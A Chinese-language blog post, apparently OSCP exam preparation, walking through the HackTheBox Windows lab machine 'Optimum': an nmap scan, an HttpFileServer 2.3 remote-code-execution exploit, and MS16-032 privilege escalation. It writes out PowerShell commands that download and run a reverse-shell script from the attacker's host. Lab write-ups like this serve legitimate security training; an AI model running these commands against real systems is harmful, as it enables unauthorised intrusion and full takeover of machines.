EthanDoctor

OSCP备考_0x39_HackThBox靶机_Windows_Optimum

Ethan医生5个月前靶场159


nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.254.155 (扫描TCP)

image.png


image.png

查看到版本是2.3,有rce

image.png



python3 49125.py 10.129.254.155 80  "c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.43:8000/Invoke-PowerShellTcp.ps1')"


image.png

开始操作提权

查询漏洞

https://github.com/rayhan0x01/reverse-shell-able-exploit-pocs/blob/master/ms16-032.md 发现有MS16032漏洞

尝试上传挡案

image.png

下载后执行. 

Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('http://10.10.16.43:8000/Invoke-PowerShellTcp.ps1')"

image.png

直接执行./Invoke-MS16032.ps1 直接拿下

image.png






标签: OSCP
返回列表

上一篇:OSCP备考_0x38_HackThBox靶机_Windows_Devel

下一篇:OSCP备考_0x40_HackThBox靶机_Windows_Bastard

相关文章

OSCP备考_0x03_Vulnhub靶机_KIOPTRIX:LEVEL1.2(#3)

OSCP备考_0x03_Vulnhub靶机_KIOPTRIX:LEVEL1.2(#3)

名称说明靶机下载链接https://www.vulnhub.com/entry/kioptrix-level-12-3,24/攻击机(kali)ip:192.168.233.168靶机(CentOS)...

OSCP备考_0x17_Vulnhub靶机_joy

OSCP备考_0x17_Vulnhub靶机_joy

名称说明靶机下载链接攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.168.233.184arp-scan 192.168.233.1/24nmap -p- 1...

OSCP备考_0x08_HackThBox靶机_Linux_Valentine

OSCP备考_0x08_HackThBox靶机_Linux_Valentine

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.3.150 (扫描TCP)nmap -sU --top-ports 100 10.129.3.15...

OSCP备考_0x05_Vulnhub靶机_KIOPTRIX:2014 (#5)

OSCP备考_0x05_Vulnhub靶机_KIOPTRIX:2014 (#5)

名称说明靶机下载链接https://www.vulnhub.com/entry/kioptrix-2014-5,62/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:1...

OSCP备考_0x24_HackThBox靶机_Linux_Traverxec

OSCP备考_0x24_HackThBox靶机_Linux_Traverxec

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.21.112 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x10_HackThBox靶机_Linux_Sunday

OSCP备考_0x10_HackThBox靶机_Linux_Sunday

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.252.243 (扫描TCP)nmap -sU --top-ports 100 10.129.25...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Copyright Your hacksec.top Rights Reserved.

Powered By Z-BlogPHP. - 鄂ICP备2025099786号